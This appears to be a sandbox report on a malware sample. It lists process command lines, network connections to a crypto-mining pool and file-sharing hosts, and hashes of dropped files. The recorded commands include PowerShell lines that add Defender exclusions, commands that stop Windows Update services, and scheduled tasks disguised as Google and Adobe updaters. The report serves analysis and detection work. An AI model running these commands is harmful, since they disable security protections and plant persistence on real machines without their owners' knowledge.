"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc100446f8,0x7ffc10044708,0x7ffc10044718
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1732 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1668 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=31871 --allow-pre-commit-input --field-trial-handle=1468,15197628838015195314,7033659375596943053,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3120 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2068 -ip 2068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 284
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process <#datdpvvcoapg#> powershell <#pvuibonxcabzvdcqogx#> -Verb <#pvuibonxcabzvdcqogx#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc daily /st 13:34 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc daily /st 13:34 /f /tn AdobeUpdateTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| PL | 51.83.170.21:19447 | | tcp |
| US | 8.8.8.8:53 | 21.170.83.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:31791 | | tcp |
| N/A | 127.0.0.1:31791 | | tcp |
| N/A | 127.0.0.1:31791 | | tcp |
| N/A | 127.0.0.1:31791 | | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| N/A | 127.0.0.1:31871 | | tcp |
| N/A | 127.0.0.1:31871 | | tcp |
| N/A | 127.0.0.1:31871 | | tcp |
| N/A | 127.0.0.1:31871 | | tcp |
| US | 8.8.8.8:53 | stratum-eu.rplant.xyz | udp |
| FR | 141.94.192.217:17056 | stratum-eu.rplant.xyz | tcp |
| US | 8.8.8.8:53 | 217.192.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:80 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 163.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| RU | 185.159.129.168:80 | | tcp |
| RU | 185.149.146.118:80 | | tcp |
| RU | 77.91.77.144:80 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:80 | pastebin.com | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| RU | 46.29.235.84:80 | 46.29.235.84 | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.235.29.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
memory/4880-133-0x0000000000380000-0x00000000003B4000-memory.dmp
memory/4880-134-0x0000000074880000-0x0000000075030000-memory.dmp
memory/4880-135-0x00000000054C0000-0x0000000005AD8000-memory.dmp
memory/4880-136-0x0000000004FB0000-0x00000000050BA000-memory.dmp
memory/4880-137-0x0000000004D40000-0x0000000004D52000-memory.dmp
memory/4880-138-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4880-139-0x0000000004EE0000-0x0000000004F1C000-memory.dmp
memory/4880-140-0x00000000051C0000-0x0000000005236000-memory.dmp
memory/4880-141-0x00000000052E0000-0x0000000005372000-memory.dmp
memory/4880-142-0x0000000006580000-0x0000000006B24000-memory.dmp
memory/4880-143-0x0000000074880000-0x0000000075030000-memory.dmp
memory/4880-144-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/4880-145-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4880-146-0x0000000006020000-0x0000000006070000-memory.dmp
memory/4880-147-0x0000000006B30000-0x0000000006CF2000-memory.dmp
memory/4880-148-0x0000000008BE0000-0x000000000910C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mi.exe
| MD5 | aba23d7f60f40f4dee64fa440d5db6e6 |
| SHA1 | dde62462dc7887a6b3ba193eafb50da17ef40e67 |
| SHA256 | 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6 |
| SHA512 | ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40 |
C:\Users\Admin\AppData\Local\Temp\cli.exe
| MD5 | b78141a544759e1a07740aa28b35584c |
| SHA1 | af95ccd7d12c7ed7bdc6782373302118d2ebe3a8 |
| SHA256 | e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d |
| SHA512 | 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959 |
memory/2068-165-0x0000000000960000-0x0000000000BEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cc.exe
| MD5 | 858f82fe9166c34b6709a3adfe6a625f |
| SHA1 | 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5 |
| SHA256 | 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28 |
| SHA512 | 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e |
memory/4924-182-0x0000000000D40000-0x0000000001374000-memory.dmp
memory/4924-183-0x0000000077394000-0x0000000077396000-memory.dmp
memory/4924-184-0x0000000000D40000-0x0000000001374000-memory.dmp
C:\Windows\Temp\setup.exe
| MD5 | bc202c47461acbe8bef80e143eb3a364 |
| SHA1 | 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634 |
| SHA256 | df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb |
| SHA512 | 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08 |
memory/4924-187-0x00000000033D0000-0x0000000003440000-memory.dmp
memory/4880-188-0x0000000074880000-0x0000000075030000-memory.dmp
memory/4924-192-0x0000000005EB0000-0x0000000005EC0000-memory.dmp
memory/4924-193-0x0000000005EB0000-0x0000000005EC0000-memory.dmp
memory/3328-195-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp
memory/4924-197-0x0000000006080000-0x00000000060A2000-memory.dmp
memory/4924-196-0x0000000005EB0000-0x0000000005EC0000-memory.dmp
memory/4924-191-0x00000000747F0000-0x0000000074FA0000-memory.dmp
memory/3328-194-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/3328-229-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/3328-230-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/3328-231-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/3328-232-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/3328-233-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\CrashpadMetrics-active.pma
| MD5 | 03c4f648043a88675a920425d824e1b3 |
| SHA1 | b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d |
| SHA256 | f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450 |
| SHA512 | 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192 |
memory/4924-237-0x0000000000D40000-0x0000000001374000-memory.dmp
memory/3328-238-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/2068-239-0x0000000000960000-0x0000000000BEB000-memory.dmp
memory/4924-240-0x0000000000D40000-0x0000000001374000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Local State
| MD5 | 9965c8dce58eb7184ad24b423a6225f8 |
| SHA1 | 16e6423fd94286a61fe3e7e0f5235c262890b791 |
| SHA256 | b3365080d4de2e38ef56ec0aa0162ea2578ed9ecd7fee8e60c32088f2e6d7edc |
| SHA512 | 11c32758fd295fe7dc48a1a1f078e6e9df3a976ac3335b932ed352376e9cf5e6d3e97de74043b511123632e9a9f4fb674703035b94aedca507e7af2d71e67237 |
\??\pipe\crashpad_4932_NWFSMGQZRWMRNHMR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Cookies
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\TransportSecurity
| MD5 | d4fd749ea6b39513a29c14e0fe9e8601 |
| SHA1 | 9a5cc5660547a645890b7af658fba5521c92c097 |
| SHA256 | 0126bcb7e2dfe80ab6c224fa002ebc9ef69fb042303b6bf1fea0bba526d4e602 |
| SHA512 | 876f32b3f6b6a9bcdc84e0022d20d4a106fd78535bc2f690619e70f8d00d5ce0971368bdbcc0ddd3dcfb4dabfc2cc7bf582eb6db83ee984cc496229eb46b14dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Reporting and NEL
| MD5 | 62781fd592efa8532f4b425fabd2d719 |
| SHA1 | 648e070efbc5848e97dd9fb2efa639664772e058 |
| SHA256 | fb7c56a9cc1f99b979a0decf5d175fb2f9b504f1c29d76d66493e48ab29fde91 |
| SHA512 | cad3cdcfdb9e5749371a7260a81110fe05f90294894e3017900f6d6bd8f9e0dbc30ea7a973dfa8b8ad00fb78747ce065434196d7543faf7d552f415fa98f5027 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Network\Network Persistent State
| MD5 | 8758dd064381f85083936ba939fdde60 |
| SHA1 | a32a9a75b97e33bd15b36186d42a5d3c79b8e85b |
| SHA256 | 51acbfabd6ced867747294e73c024461f30f4d442b57be2c31f056319c889fbb |
| SHA512 | 6102ad36804d5b040bf52e4968b51e6da23ffacac949f533337d6ff0513e4987ca24dce35d8f0e729fccd027374f52fe92e5f3eee9a1f92f4f962a5247ec8a8c |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG
| MD5 | a3192dfebce225e41cb53f13a5dae579 |
| SHA1 | 4b09a382cbc7fa3dcf714879385fe4284a80b271 |
| SHA256 | 8e0ef26109c6414afcc2e54db6b40eceb2dab30936ce9c0e2e976f1999a010bc |
| SHA512 | bc7e26ea467159bf71fd1b07d2514c10f5abbd31891e2aec801a5e1e95cc35e27003b541d9f6527d0d32a7364a9a153837675ee61492d7d2bb1b309dd0b4908c |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG.old
| MD5 | aff6748bce5e626344be4605b2bfe475 |
| SHA1 | 5ae77f3270ce96eac6a16b1656fff16a898d32b1 |
| SHA256 | dea34914bd7d59c9bf50f05da8880bb94482e9b8c4215e7fe2ddad2b0bc38ce7 |
| SHA512 | 51fa9769f33a568667f5794251750465d6bb29b281297f6b97d8f6fdaa6d9bef96cbf98640b5181c1583c59a70e27a24f5e9b31104971fcaa222fba9ee7547ea |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
memory/4924-270-0x0000000005EB0000-0x0000000005EC0000-memory.dmp
memory/4924-269-0x00000000747F0000-0x0000000074FA0000-memory.dmp
memory/3328-277-0x00007FFC1E7D0000-0x00007FFC1E9C5000-memory.dmp
memory/4924-276-0x0000000005EB0000-0x0000000005EC0000-memory.dmp
memory/3328-285-0x00007FF7A5140000-0x00007FF7A63A5000-memory.dmp
memory/416-286-0x0000024D35860000-0x0000024D35882000-memory.dmp
memory/416-287-0x00007FFBFDED0000-0x00007FFBFE991000-memory.dmp
memory/416-288-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp
memory/416-289-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nilgdvfq.5fq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/416-299-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp
memory/416-300-0x0000024D1D1A0000-0x0000024D1D1B0000-memory.dmp
memory/416-302-0x00007FFBFDED0000-0x00007FFBFE991000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 2d29fd3ae57f422e2b2121141dc82253 |
| SHA1 | c2464c857779c0ab4f5e766f5028fcc651a6c6b7 |
| SHA256 | 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4 |
| SHA512 | 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68 |
memory/4744-305-0x00007FFBFDFF0000-0x00007FFBFEAB1000-memory.dmp
memory/4744-306-0x000002DC01550000-0x000002DC01560000-memory.dmp
memory/4744-308-0x000002DC01550000-0x000002DC01560000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/4744-338-0x000002DC01550000-0x000002DC01560000-memory.dmp
memory/4744-342-0x000002DC01550000-0x000002DC01560000-memory.dmp
memory/4744-353-0x00007FFBFDFF0000-0x00007FFBFEAB1000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Cache\Cache_Data\data_0
| MD5 | d1f604157b0745a40453afb93a6caa42 |
| SHA1 | 3d5d77429b03674ebb0ba34d925ba1b09310df5e |
| SHA256 | 468456974fd86b33647942820dce7284879acfab9e9e6eca008e1fdcf9006fb5 |
| SHA512 | 0644ce93724a57dedd8aec208e5a038e323a1b9871d5046d58a87c60479626693e6c8f25b7c7f7b60fd35aac133d2e660ecbd8f8d579ad1fc6703ae117a485a0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\LOG
| MD5 | ac43bacf5f3c65e5b3f8af913e9ca323 |
| SHA1 | eb84e48ed33eb7d4dedfb5cb2f6e659225bab51f |
| SHA256 | 2bb88cb5d941a9a159f5014c18a8f0dfd072a5c86cd1ca43bb984447ef915f59 |
| SHA512 | 0d71e9e4139141ebfcff76ab0aa8db9972a5530cd31151678cd4ede3e56b91196e5d76ee5c9af90d0694efe1a0da9bf087ebdfe9cdc0e36b85259e8849de589a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\DawnCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP\Default\Local Storage\leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Session Storage\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Default\Local Storage\leveldb\LOG
| MD5 | 2ba90e1323aec1c69f1bc5aa17235aff |
| SHA1 | cc2694aa56aa8cfdbe99f1d055c13b816ba3834b |
| SHA256 | 00387e50e9d4273fc2a55fc19411b06e83c114ed70987cf2a6a80f2ea00c3b33 |
| SHA512 | 35e2fba15bf1081ceca7cea82278b7f33afb6c560f8effde5fc7b7fb10da08018544b405379473b5439a18e6a71b749d8200e5592e01b6878ffd13db4e4b2459 |
